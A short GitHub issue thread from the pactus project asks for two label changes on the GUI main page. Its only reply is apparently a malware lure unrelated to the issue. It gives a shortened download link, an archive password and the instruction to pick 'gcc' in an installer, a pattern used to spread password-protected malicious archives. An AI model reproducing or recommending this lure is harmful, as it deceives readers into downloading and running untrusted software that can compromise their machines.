### ISSUE TITLE
Changes on GUI main page

### ISSUE THREAD

**Issue by b00f** [pactus-project/pactus#1490]
Please apply these changes on the Main page of GUI (as suggested by @Mr-HoDL58 ):

- Rename "Is Prune" to "Pruned" and move it to top after "Reachability"
- Rename "Number of blocks left" to "Remaining Blocks"

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
